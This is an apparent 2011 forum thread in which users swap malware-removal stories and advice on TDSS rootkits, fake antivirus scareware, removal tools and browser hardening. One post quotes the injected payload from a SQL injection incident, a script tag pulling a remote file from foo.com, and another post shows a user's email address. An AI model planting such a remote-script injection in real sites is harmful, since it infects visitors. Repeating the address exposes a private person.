|
JustFrakkingDoIt posted:And on the same subject, anybody more knowledgeable know of reasons not to use Secunia PSI? I'm really liking it so far. Personally, I don't really care enough that I'm running an outdated version of some software to be notified of it in real time. And it was another thing that churned my hard drive in the background. So I uninstalled it from my computer.
|
#
?
Mar 17, 2011 13:47
|
|
|
|
| # ? Jun 7, 2024 09:06 |
|
|
I tried it for the hell of it and all it showed me was that I'm very good at keeping things updated on my own. 
|
|
#
?
Mar 17, 2011 18:33
|
|
|
Hipster_Doofus posted:I tried it for the hell of it and all it showed me was that I'm very good at keeping things updated on my own. The first time I ran it, it found some legit outdated software and I updated them. It also found a lot of outdated poo poo from D:\Old poo poo from old computer\Program files\whothefuck\evencares.exe, which I deleted to get a higher percentage. After that I was mostly *I install some new software* *Secunia pops up a balloon "Software changes detected"* Thanks for telling me I installed something.
|
|
#
?
Mar 17, 2011 20:32
|
|
|
My laptop just got hit with a drive-by virus just as I was casually browsing on it yesterday. I wasn't browsing any suspicious sites when it happened. Suddenly, a pop-up baloon appeared in the system tray, warning me about an infection in some file. A fake icon looking just like the Windows Action Center appeared, but I couldn't click it. It came up with a fake virus scanner, and some more fake pop-ups. I opened the task manager, and saw a suspicious process with a garbled named. When I tried to end it, focus was taken away from the task manager. After about 30 seconds more, I could see the hard drive working a lot, and a bit later, the screen went dark. That's when I just shut it off forcibly. I rebooted in safe mode, ran HiJackThis, and found the executable, plus I installed and ran the MS Security Essentials, which found Trojan:DOS/Shetwirl.M. It removed it, but I took no chances and just nuked the whole laptop and installed a fresh Windows 7 SP1. I used Firefox on the laptop, but I think (can't remember) I had noscript off, and didn't have FlashBlock, plus the flash player and Windows Updates were probably half a year to a year out of date, since I rarely use the laptop. Lesson learned, use the full browser protection package, update frequently, and keep MS Security Essentials installed. I was just being a slacker because it was just a laptop with nothing important, but you never know.
|
|
#
?
Mar 19, 2011 14:45
|
|
|
A month back I got a Trojan called something along the lines of "Trojan.Rootkit.Hijack32" or something like that. When I first got it I was just browsing some site I have gone to for a few years without having a problem but suddenly I saw the Java screen pop-up and a few seconds later I got a Blue Screen and the PC re-booted. I spent a few hours reading up on how to remove this bastard, following longs guides on some forum were the support guy just wanted Log files or whatever. I decided to check this thread instead and found TDSSKiller which removed the Trojan immediately. But today, one of my hard drives (I have one 1TB and one 120GB Intel X-25 SSD) disappeared from "My Computer" and fixed it with a re-boot. After the re-boot my Windows just froze, the browser, Twitter client, everything except for the cursor. Before I knew it, I got a Blue Screen and an automatic re-boot and was then met with a "Hardware or software has been changed" message with a status code 0xc00000e and it refused to boot and I think I will try to re-install Windows 7 tomorrow. The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this?
|
|
#
?
Mar 20, 2011 01:42
|
|
|
von Braun posted:The thing is, when I first got the Trojan I read that the rootkit ones can pretty much destroy a hard drive forever in some way, so I was wondering if my 2 month old SSD is ruined because of this? Unless there is some new technology that allows viruses to embed themselves in the hardware, there's no virus that can survive a format/reinstall... unless it is somehow embedded in the MBR and it doesn't get wiped. In that case, just overwrite the entire drive with 0's.
|
|
#
?
Mar 20, 2011 05:16
|
|
|
The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.
|
|
#
?
Mar 20, 2011 05:17
|
|
|
von Braun posted:A month back I got a Trojan called something along the lines of "Trojan.Rootkit.Hijack32" or something like that. When I first got it I was just browsing some site I have gone to for a few years without having a problem but suddenly I saw the Java screen pop-up and a few seconds later I got a Blue Screen and the PC re-booted. TDSS can be a real pain in the balls - and it'll usually gently caress you over if you don't remove it before doing anything. It'll also make OEM images fail. In your case, I don't really think the two are related. You didn't give us much information. Are both drives connected to the same controller? Have you tried changing ports? Did you try a different controller? What about Last Known Good Config, Safe Mode, or the Recovery Console? Your best plan of attack here is to get back into windows somehow, and run TDSSKiller from there. For all we know though, it could be any one of a wide range of issues cropping up.
|
|
#
?
Mar 20, 2011 06:15
|
|
|
Factory Factory posted:The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway. Infected MBR was a common feature with a ton of viruses throughout the 90s and early 2000s.
|
|
#
?
Mar 20, 2011 06:37
|
|
|
Had a friend get hit with System Tool today, after a little google and some scanning I managed to come out of it one bottle of booze richer.  He found it hilarious that my first reaction to seeing his computer was "oh yeah, I've seen this before!"
|
|
#
?
Mar 20, 2011 08:00
|
|
|
PopeOnARope posted:In your case, I don't really think the two are related. You didn't give us much information. Are both drives connected to the same controller? Have you tried changing ports? Did you try a different controller? What about Last Known Good Config, Safe Mode, or the Recovery Console? Your best plan of attack here is to get back into windows somehow, and run TDSSKiller from there. I have tried changing ports on the motherboard and trying to boot it with only the system disk (the SSD) connected and then it tells me to insert a "Boot Media in selected Boot Device". And for the Last Good Config and Safe Mode I can't really get that far into the boot process. Unless I can make something happen I will attempt a re-format later today.
|
|
#
?
Mar 20, 2011 13:22
|
|
|
von Braun posted:I have tried changing ports on the motherboard and trying to boot it with only the system disk (the SSD) connected and then it tells me to insert a "Boot Media in selected Boot Device". And for the Last Good Config and Safe Mode I can't really get that far into the boot process. Get your hands on a boot CD (linux live cd, or a version of Hiren's with Mini XP, hilariously illegal as that is) and take a look at the drives.
|
|
#
?
Mar 20, 2011 16:19
|
|
|
I decided to just re-format my PC and everything is working fine. I have license of NOD, is there anything else I should have to prevent this poo poo from happening again other than not visit suspicious sites? Thanks for your help!
|
|
#
?
Mar 20, 2011 16:36
|
|
|
von Braun posted:I decided to just re-format my PC and everything is working fine. I have license of NOD, is there anything else I should have to prevent this poo poo from happening again other than not visit suspicious sites? (this needs to be in the OP in gigantic red font) Update Flash, Update Java. Firefox + NoScript. Take regular backups - image backups even so you can just roll back at a moment's notice. If all else fails, try a pact with Satan.
|
|
#
?
Mar 20, 2011 23:31
|
|
|
PopeOnARope posted:(this needs to be in the OP in gigantic red font) Use Firefox or Chrome with NoScript and Adblock Plus and disable/uninstall any unneeded plugins. Make sure your browser is kept up to date with automatic updates. Check Mozilla's plugin check regularly to see if you have vulnerable plugins. Make sure you are receiving Microsoft updates for all Microsoft software (not just Windows), and keep all third-party software up-to-date that interacts with downloaded material of any kind, whether it has a plugin for a browser or not. Only install Java when you actually need it and uninstall it promptly when finished. If you need to have Java installed all the time due to Java-dependent software, keep it updated at all times and disable Java plug-ins/add-ons in all your browsers. Keep in mind that Oracle rarely issues "out-of-band" critical updates/patches for Java, leaving security and bug fixes for the next quarterly release - and leaving you vulnerable until Oracle's next scheduled release. Unless you don't have it installed in the first place, of course. Keep Adobe Acrobat, Adobe Reader, or any third-party PDF viewers up-to-date and ideally disable their plug-in/add-on. Make sure Acrobat/Reader security settings are set for maximum security: delete the Flash authplay.dll that's bundled with Acrobat/Reader, disable javascript, disallow multimedia operations, enable enhanced security, disallow opening of non-PDF files. Keep Adobe Flash and Adobe Shockwave updated. Make sure Flash is set to check for updates automatically. Do not install Shockwave unless you actually need it as many people neglect to check for Shockwave updates and Adobe does not have an option to automatically check for Shockwave updates. Keep Apple Quicktime updated, or either disable the plug-in/add-on on all browsers or just don't install Quicktime. If you use VLC, Winamp, or some other media player, make sure that it is updated as they have been known to have critical vulnerabilities with some types of files. Any other programs that interact with downloaded files should be kept updated. For example, if you use uTorrent, even without a browser plug-in, you are still opening downloaded .torrent files that could exploit older versions of uTorrent with critical vulnerabilities. If you're in a locked-down corporate, university, or public machine where you cannot update plugins, browsers, uninstall Java, etc. - use a USB flash drive with Portable Apps configured for secure and private browsing. But good luck getting even experienced computer enthusiasts or professionals to do the above, let alone the casual user. Megiddo fucked around with this message at 00:53 on Mar 21, 2011 |
|
#
?
Mar 21, 2011 00:49
|
|
|
Good summary. The only other things you might want to mention are that people use MSE, FlashBlock, and what exactly the various removal programs do. Looks this this thread is about 3 years old, you might want to start a new one.
|
|
#
?
Mar 21, 2011 08:37
|
|
|
I find NoScript to be more trouble than it's worth to be honest. Using AdBlock and a browser that blocks known malicious sites (Firefox and IE both do, I assume Chrome does too) is less intrusive and still quite effective.
|
|
#
?
Mar 21, 2011 10:40
|
|
|
BillWh0re posted:I find NoScript to be more trouble than it's worth to be honest. Using AdBlock and a browser that blocks known malicious sites (Firefox and IE both do, I assume Chrome does too) is less intrusive and still quite effective.
|
|
#
?
Mar 21, 2011 11:17
|
|
|
Megiddo posted:The problem with just using AdBlock and/or FlashBlock is that they don't block the execution of scripts or prevent content from downloading - in many, if not most, cases they just block it from displaying in the browser by merely hiding the ad content. Unless you block the scripts from running in the first place with something like NoScript, you're still open to attack from malicious scripts. AdBlock Plus for Firefox does stop content from being downloaded. I'm not sure about other browsers (I think the Chrome one was recently updated to do this). You can probably test by killing Flash, opening a new browser window and browsing a site with a single blocked Flash ad, then seeing if Flash has been loaded. The problem I have with NoScript is really that it's so fiddly and most users won't know which sites to allow, because there are a whole lot of legitimate uses for cross-domain javascript loading these days. Also, in cases where the malicious JS is embedded in the compromised page itself, it's not so useful since you probably already whitelisted the page. If you know in advance that you're going to be visiting some compromised or malicious sites then NoScript is great, but for regular browsing it's overkill by far and steps over the line from "good enough security" to "interfering with productivity".
|
|
#
?
Mar 21, 2011 11:52
|
|
|
Sup goons, my kid brother's laptop just got Antivirus 2011 (jesus christ), and I wanted to know, what is the best way of removing/purging this horrible being from beyond space and time?
|
|
#
?
Mar 21, 2011 12:27
|
|
|
Ryand-Smith posted:Sup goons, my kid brother's laptop just got Antivirus 2011 (jesus christ), and I wanted to know, what is the best way of removing/purging this horrible being from beyond space and time? From memory I think it's just a couple of files located in C:\ProgramData\<randomlettersmumbers>\<randomlettersmumbers>.exe Pretty sure that is just for Vista/7 though. Also boot in to Safe Mode first. But the easiest way is to just run ComboFix or MalwareBytes. (or both!)
|
|
#
?
Mar 21, 2011 14:08
|
|
|
beastathon posted:From memory I think it's just a couple of files located in C:\ProgramData\<randomlettersmumbers>\<randomlettersmumbers>.exe On XP it's often located in C:\Documents and Settings\All Users\[random]\[random].exe ; hell, sometimes it will even create a desktop shortcut that gives away the location if you check its properties!
|
|
#
?
Mar 21, 2011 21:35
|
|
|
Yeah it's pretty easy to remove, you can usually do it just by checking the hijack this settings. One thing to watch out for (though perhaps less likely for scareware) is if it phones home before you caught it, it might download something else through the same exploit/another exploit it makes itself. Normally I'd say this stuff rarely exists in isolation, but I'm actually finding that the attendant 'ecosystem' that accompanies scareware is a bit less diverse now. I'm not sure if it's because they don't want to mess up the computer before they get a payment, or if the infectors are starting to specialize in terms of their payloads.
|
|
#
?
Mar 22, 2011 00:54
|
|
|
Scaramouche posted:Normally I'd say this stuff rarely exists in isolation, but I'm actually finding that the attendant 'ecosystem' that accompanies scareware is a bit less diverse now. I'm not sure if it's because they don't want to mess up the computer before they get a payment, or if the infectors are starting to specialize in terms of their payloads. It could also be that people are catching older viruses or scareware that is trying to connect to servers that have already been taken down.
|
|
#
?
Mar 22, 2011 06:31
|
|
|
Has anyone tried changing the registry permissions on the group policy keys so the user and system can't write to them? I have a guy who keeps stumbling in to viruses that set them to do things like lock his desktop to some warning message and whatnot. My hope is that the majority of these viruses are too dumb to actually modify permissions before they write there, and the policy keys are more headache than they are worth on XP Home. Hopefully it doesn't break anything.
|
|
#
?
Mar 22, 2011 13:41
|
|
|
BangersInMyKnickers posted:Has anyone tried changing the registry permissions on the group policy keys so the user and system can't write to them? I have a guy who keeps stumbling in to viruses that set them to do things like lock his desktop to some warning message and whatnot. My hope is that the majority of these viruses are too dumb to actually modify permissions before they write there, and the policy keys are more headache than they are worth on XP Home. Hopefully it doesn't break anything. I've never been a fan of doing it manually, instead preferring solutions like Deep Freeze et al.
|
|
#
?
Mar 22, 2011 23:01
|
|
|
DEP just killed Chrome's Flash on me, throwing an error about illegal execution with a very long Chinese-character window title, but I can't tell what ad is throwing it. The only ads-displaying site I have going is SA, but the dialog is modal and I'm only using one window so I can't scroll around without dealing with it. Anyone know what this is? Maybe the bad ad referenced in the QCS sticky?
|
|
#
?
Mar 23, 2011 03:08
|
|
|
I just picked up the 2011 Security Virus aswell. Mine is named "XP Home Security 2011" and it seems it has evolved into taking over in safe mode aswell. At the moment I've rkilled it using a .com file (all .exe run another instance of 678.tmp, which is nowhere to be found on my hard drive after I deleted it) and am running MABM as I write this, and it has found 4, so hopefully I'm on the money. This one is a bit of a bitch if you don't have another PC or OS to fall back on, because you need to kill the .tmp file from running over and over and disallowing you to run any .exe or anti virus programs. If this all works out I'll post the link I followed. Edit: Success. http://www.bleepingcomputer.com/virus-removal/remove-win-7-internet-security-2011 The Temp and Reg files are all different though for me. Mine was a set of 3 numbered .tmp files. Diet Crack fucked around with this message at 19:02 on Mar 23, 2011 |
|
#
?
Mar 23, 2011 18:50
|
|
|
Diet Crack posted:I just picked up the 2011 Security Virus aswell. Mine is named "XP Home Security 2011" and it seems it has evolved into taking over in safe mode aswell. At the moment I've rkilled it using a .com file (all .exe run another instance of 678.tmp, which is nowhere to be found on my hard drive after I deleted it) and am running MABM as I write this, and it has found 4, so hopefully I'm on the money. I had to kill that this morning. Watch out for it unregistering your .exe associations.
|
|
#
?
Mar 24, 2011 03:10
|
|
|
TDSS has been a real pain in the rear end for me lately. I've had TDSSKiller kill two computers after running it (although one I got back by restoring the registry backup from /windows/system32/config/regback), but I've had another machine where it has kept coming back over the past few months, even when I've pulled the hard drive out, hooked it to another machine and ran TDSSKiller and it removes it from there, deleted old restore points and all that poo poo. It will say it's gone, but then it's back again 3 weeks later. I don't loving know what the deal is.
|
|
#
?
Mar 26, 2011 04:01
|
|
|
It's either not gotten cleaned up all the way or its a user/id 10 t error. I'm more willing to wager a user error.
|
|
#
?
Mar 26, 2011 04:49
|
|
|
Maniaman posted:It's either not gotten cleaned up all the way or its a user/id 10 t error. I'm more willing to wager a user error. Or the DNS settings on the router it's connected to are hosed.
|
|
#
?
Mar 26, 2011 21:59
|
|
|
The owner of the company I work for managed to contract computer AIDS this week. Internet Explorer kept crashing on his Windows Vista notebook. We upgrade the browser, works briefly then starts crashing again. This throws a red flag for me. I fire up Malwarebytes and start a scan. In the background, I swap network connections and magically Internet Explorer starts working fine again. For the hell of it I go through the hosts file. Page after page of various anti-virus, anti-malware, etc. sites being blocked.  Try to fire up the Kaspersky rescue disk and it's constantly failing database updates saying the database is corrupted every time.Wipe MBR, wipe drive, reinstall.
|
|
#
?
Mar 27, 2011 04:30
|
|
|
Read the last few pages on a whim and drat, I learned about a lot of new tools. I subscribe to the "don't be an idiot" philosophy and that has done a lot to keep me safe. And Adblock on most sites, plus script blocking extensions. And generally keeping software, etc. patched up. Previously I was using avast! but it sounds like there are better options out there now. I installed MSE based on a ton of good praise and man, I like it a lot. Question: a lot of you mention using multiple tools, which makes sense. However, when using something like MSE, would you also use things like MalwareBytes and SAS? Or do you primarily stick with one main antivirus/monitoring program and maybe fire up SAS once every couple weeks or something? Just curious. I know all these things have gotten much more complex in recent years so I just want to avoid any weird conflicts between programs and so on.
|
|
#
?
Mar 30, 2011 05:04
|
|
|
Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script> They said customers were complaining about getting trojans after visiting the site; each pageload was like 60 requests to that file. No idea what it did because by the time it was reported to us the file was gone from the server. 
|
|
#
?
Mar 30, 2011 05:17
|
|
|
feld posted:Customer of ours had pretty much every column of every table of their MSSQL database injected with <script src="http://foo.com/su.php" </script> That was when I found out that they didn't have a backup or transaction log for their production SQL database, so I got to look up the "attacker" query in the IIS logs, decode it and then reverse it after closing the hole that let them do a SQL injection in the first place. That was a fun week, and a really fun way to learn about cursors. Some data got lost if the embed string + existing data in the column in the row was too long, too, so "Foobarblahblahblah" would become "FoobarblEXPLOITEXPLOIT" and of course that couldn't be reversed. I think they put some random data entry person on trying to rebuild that stuff. 
Seat Safety Switch fucked around with this message at 05:45 on Mar 30, 2011 |
|
#
?
Mar 30, 2011 05:41
|
|
|
Seat Safety Switch posted:Something like this happened to me at another job, except they did an embedded reference to a javascript file (which probably loaded an exploit or at least did an XSS attack of some kind). It was pretty clumsy though, which made me think that whoever did it didn't really know what they were doing. A lot of the data was sanitized for output, obviously, so it never became raw HTML but instead cluttered up the page with HTML. Should've told them it was beyond salvation and rammed the point home re: backups.
|
|
#
?
Mar 30, 2011 17:04
|
|
|
personal info deleted
CraigK fucked around with this message at 01:28 on Mar 8, 2012 |
|
#
?
Mar 30, 2011 20:34
|
|
|
At a glance, if Craig3410@gmail.com is your email address, either someone hacked your email or is spoofing your email address. If it's the former, one of the computers you have used to check your email is/was probably rooted and someone stole your password, or they could just be spoofing your email address, it's trivially easy. I'd suggest changing your password and running something like RootkitRevealer on all the machines you check your mail on (assuming a 32 bit version of windows), and working from there. If someone is spoofing your email address, there isn't a whole lot you can do other than move to a new one. Prosthetic_Mind fucked around with this message at 20:59 on Mar 30, 2011 |
|
#
?
Mar 30, 2011 20:56
|
|
|
|
| # ? Jun 7, 2024 09:06 |
|
|
Prosthetic_Mind posted:At a glance, if Craig3410@gmail.com is your email address, either someone hacked your email or is spoofing your email address. Yeah, it's mine. I'm going to make a new account as soon as I can access my Google Docs, get my stuff, and close it.
|
|
#
?
Mar 30, 2011 21:04
|
|